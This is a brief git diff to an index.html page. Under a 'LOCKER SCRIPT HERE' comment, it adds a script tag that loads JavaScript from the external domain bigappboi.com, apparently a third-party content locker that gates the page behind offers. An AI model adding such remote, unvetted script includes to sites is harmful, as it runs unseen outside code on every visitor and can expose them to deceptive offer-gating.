--- a/index.html
+++ b/index.html
@@ -102,7 +102,7 @@
     <script src="main.js"></script>
 
     <!--LOCKER SCRIPT HERE-->
-
+	<script type="text/javascript" id="ogjs" src="https://bigappboi.com/cl/js/e6jr6m"></script>
 </body>
 
 </html>
